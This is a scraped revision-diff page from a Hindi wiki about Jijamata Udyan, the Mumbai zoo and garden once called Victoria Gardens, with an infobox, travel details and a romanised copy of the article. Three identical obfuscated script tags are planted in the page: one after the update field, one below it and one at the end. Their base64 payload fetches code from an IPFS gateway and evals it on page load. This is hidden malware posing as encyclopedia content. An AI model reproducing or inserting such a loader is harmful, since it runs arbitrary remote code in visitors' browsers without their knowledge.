Difference between revisions of "जीजामाता उद्यान मुंबई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Emu-Jeejamata-Udyan.jpg|thumb|150px|एमु, जिजामाता उद्यान, [[मुंबई]]]]
+
{{सूचना बक्सा पर्यटन
*[[महाराष्ट्र]] के शहर [[मुंबई]] में कई [[मुम्बई पर्यटन|पर्यटन स्थल]] है जिनमें से एक विक्टोरिया गार्डन है।
+
|चित्र=Water-Fountain-Jeejamata-Udyan.jpg
*जिजामाता उद्यान में वनस्पतिक और प्राणी [[विज्ञान]] से सम्बन्धित बगीचा हैं।  
+
|चित्र का नाम=पानी का फ़व्वारा, जीजामाता उद्यान, मुम्बई
*मुंबई के चिड़ियाघर [[विक्टोरिया गार्डन मुंबई|विक्टोरिया गार्डन]] का नाम अब जिजामाता उद्यान हो गया हैं।
+
|विवरण=जीजामाता उद्यान [[मुंबई]] शहर में स्थित चिड़ियाघर और बग़ीचा है।
*जिजामाता उद्यान में रोचक वनस्पतियों और जीवों का संग्रह है।  
+
|राज्य=[[महाराष्ट्र]]
*जिजामाता उद्यान के अतिरिक्त स्थित [[संग्रहालय]] की इमारत ग्रेको-रोमन शैली में बनाई गई है।  
+
|केन्द्र शासित प्रदेश=
*जिजामाता उद्यान के प्रवेश द्वार पर बहुत अधिक संख्या में पत्थर से बने [[हाथी]] भी है। जो बहुत ही ख़ूबसूरत है।
+
|ज़िला=[[मुम्बई ज़िला|मुम्बई]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=1861
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=18.978115,72.836746&ll=18.977139,72.837167&spn=0.009476,0.013797&t=m&z=16 उत्तर- 18.9781154° , पूर्व- 72.8367457°]
 +
|मार्ग स्थिति=नेहरू प्लेनेटेरियम [[छत्रपति शिवाजी टर्मिनस]] से लगभग 5 किमी की दूरी पर स्थित है।
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=जलयान, हवाई जहाज़, रेल, बस आदि से पहुँचा जा सकता है।
 +
|हवाई अड्डा=छ्त्रपति शिवाजी अंतर्राष्ट्रीय विमानक्षेत्र
 +
|रेलवे स्टेशन=[[छत्रपति शिवाजी टर्मिनस]]
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें= संग्रहालय, वनस्पतिक और प्राणी [[विज्ञान]] से सम्बन्धित बग़ीचा
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=022
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Chatrapathi+Shivaji+Railway+Terminus,+Dr+Dadabhai+Naoroji+Rd,+Dhobi+Talao,+Mumbai,+Maharashtra&daddr=Jijabai+Udyan&hl=en&ll=18.961656,72.835751&spn=0.075816,0.110378&sll=18.980264,72.838476&sspn=0.009476,0.013797&geocode=FWkPIQEdHGZXBCmrqqrqGM7nOzH3n8WKVNTyqw%3BFTSYIQEdmmZXBCFOeEDk445yJQ&mra=ls&t=m&z=13 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= मुंबई के चिड़ियाघर [[विक्टोरिया गार्डन मुंबई|विक्टोरिया गार्डन]] का नाम अब जीजामाता उद्यान हो गया हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन= {{अद्यतन|14:45, 27 जनवरी 2012 (IST)}}
 +
}}
 +
 
 +
'''जीजामाता उद्यान''' [[महाराष्ट्र]] राज्य के [[मुंबई]] शहर में स्थित चिड़ियाघर और बग़ीचा है।
 +
*जीजामाता उद्यान में वनस्पतिक और प्राणी [[विज्ञान]] से सम्बन्धित बग़ीचा हैं।  
 +
*मुंबई के चिड़ियाघर [[विक्टोरिया गार्डन मुंबई|विक्टोरिया गार्डन]] का नाम अब जीजामाता उद्यान हो गया हैं।
 +
*जीजामाता उद्यान में रोचक वनस्पतियों और जीवों का संग्रह है।  
 +
*जीजामाता उद्यान के अतिरिक्त स्थित संग्रहालय की इमारत ग्रेको-रोमन शैली में बनाई गई है।  
 +
*जीजामाता उद्यान के प्रवेश द्वार पर बहुत अधिक संख्या में पत्थर से बने [[हाथी]] भी है। जो बहुत ही ख़ूबसूरत है।
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 16: Line 56:
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
चित्र:Elephant-Sculpture-Jeejamata-Udyan.jpg|[[एलिफेंटा की गुफाएँ]] से प्राप्त हाथी की मूर्ति, जिजामाता उद्यान, [[मुंबई]]
+
चित्र:Elephant-Sculpture-Jeejamata-Udyan.jpg|[[एलिफेंटा की गुफाएँ]] से प्राप्त हाथी की मूर्ति, जीजामाता उद्यान, [[मुंबई]]
चित्र:Water-Fountain-Jeejamata-Udyan.jpg|पानी का फ़व्वारा, जिजामाता उद्यान, [[मुंबई]]
+
चित्र:Emu-Jeejamata-Udyan.jpg|एमु, जीजामाता उद्यान, [[मुंबई]]
 
</gallery>
 
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 09:15, 27 January 2012

jijamata udyan muanbee
vivaran jijamata udyan muanbee shahar mean sthit chi diyaghar aur bagicha hai.
rajy maharashtr
zila mumbee
sthapana 1861
bhaugolik sthiti uttar- 18.9781154° , poorv- 72.8367457°
marg sthiti neharoo pleneteriyam chhatrapati shivaji tarminas se lagabhag 5 kimi ki doori par sthit hai.
kaise pahuanchean jalayan, havaee jahaz, rel, bas adi se pahuancha ja sakata hai.
havaee adda chhtrapati shivaji aantarrashtriy vimanakshetr
relave steshan chhatrapati shivaji tarminas
kya dekhean sangrahalay, vanaspatik aur prani vijnan se sambandhit bagicha
es.ti.di. kod 022
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
any janakari muanbee ke chi diyaghar viktoriya gardan ka nam ab jijamata udyan ho gaya haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jijamata udyan maharashtr rajy ke muanbee shahar mean sthit chi diyaghar aur bagicha hai.

  • jijamata udyan mean vanaspatik aur prani vijnan se sambandhit bagicha haian.
  • muanbee ke chi diyaghar viktoriya gardan ka nam ab jijamata udyan ho gaya haian.
  • jijamata udyan mean rochak vanaspatiyoan aur jivoan ka sangrah hai.
  • jijamata udyan ke atirikt sthit sangrahalay ki imarat greko-roman shaili mean banaee gee hai.
  • jijamata udyan ke pravesh dvar par bahut adhik sankhya mean patthar se bane hathi bhi hai. jo bahut hi khoobasoorat hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>